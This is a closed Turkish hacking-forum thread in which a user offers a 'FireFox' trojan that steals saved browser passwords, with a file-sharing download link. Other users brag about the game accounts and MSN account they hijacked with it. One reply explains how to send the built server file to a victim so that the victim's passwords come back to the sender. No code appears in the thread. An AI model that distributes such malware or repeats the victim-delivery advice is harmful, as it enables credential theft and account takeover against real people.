iste ise yarar bi trojan

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

fleety

Banned
Reaction score
0
Firefox Pass'le trojene farklı bir açıdan bakın...!

'FireFox' trojenı Mozilla Firefox'tan yapılan tum sifreleri we diger sifreleri almamizi saglar...! Bu trojen sayesinde arkadasim 73 lwl mage hackledi.
4089_FireFox.bmp.html

DOWNLOAD:
http://rapidshare.com/files/16893288/firefox.rar

İyi Eğlenceler...

Bir teşekkürü çok görenin bilgisayarına trojen bulaşsın:vur :vur :vur :biggrin

2 tane Ayni Konudan Acmissin Arkadaisim

evet iyi bir calısmaya benzior ama yenide hacklediginiz insanlar hakedenler olursa cok daha yaralı olur hem sizin hemde oyun sevenleriçin bu konusda adminlerden de yardım istiorum oyunda dupe yapan bug yapan arkadarların hacklenmesi konusunda elinizden geleni yapın cunku dupecilerin kazandıgı haksız her kurus bir zarardır nedenini de biliorsunuz ve oyun bagımlıları arkadaslarımız istemeselerde bu paraları vermek zorunda kalıolar sigara bagımlıları gibi bu solediklerim nerden cıktı die sorucaksınız hiç aklıma geldi paylasiim dedim şimdiden tskr ediorum tekrar ellerine saglık saolasın paylasımın için...!!

haklisin tabii ama ben bu keylogu hackhell yararlansin die koydum artik kimi hacklersinis o sise kalmis:D

bnmde bi sorum olcak bn ne saman yıldıslı olcam?...:D

amk baktim 56 goruntuleme kac cwp insan begenmese de bi emegine saglik der bis bole bi nankor milletis iste

amk baktim 56 goruntuleme kac cwp insan begenmese de bi emegine saglik der bis bole bi nankor milletis iste

Arkadasim bence sen ilk once bir form kurallarini okusan iyi olcak :vur

Saol güzelmişş ben yeniyim ama gelir gelmez hackhell'e ganimetlerinden faydalandım bir adam hackledim 487 kişi var msninde çok saol işime yaradı.

kardes nasıl kullanıyoruz server olusturduktan sonra serveri kurbana vericez . mesela knıght online klasorune atarsa bize mail gelirmi yada ona ayırca tıklamasımı lazım

siyahates' Alıntı:
kardes nasıl kullanıyoruz server olusturduktan sonra serveri kurbana vericez . mesela knıght online klasorune atarsa bize mail gelirmi yada ona ayırca tıklamasımı lazım
Kardeş server oluşturduktan sonra karşı tarafa yolluyorsun ve içine açınca şifreler sana geliyor...

mesutcal' Alıntı:
www.ogame.com.tr biri burayı hacklese arkadaşlar olmazmı?

kardeşim şu siteyi hackleyin demek yasak ayrıca olmasa bile bunu sölüceğın yer bura mı keylogger trojan bölümü deil bence bi webhackinge bak

tskler
Ama gerek yokdu 73 lwl mage demek ondan demişdir aradsımız

Link kırıq

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
Geri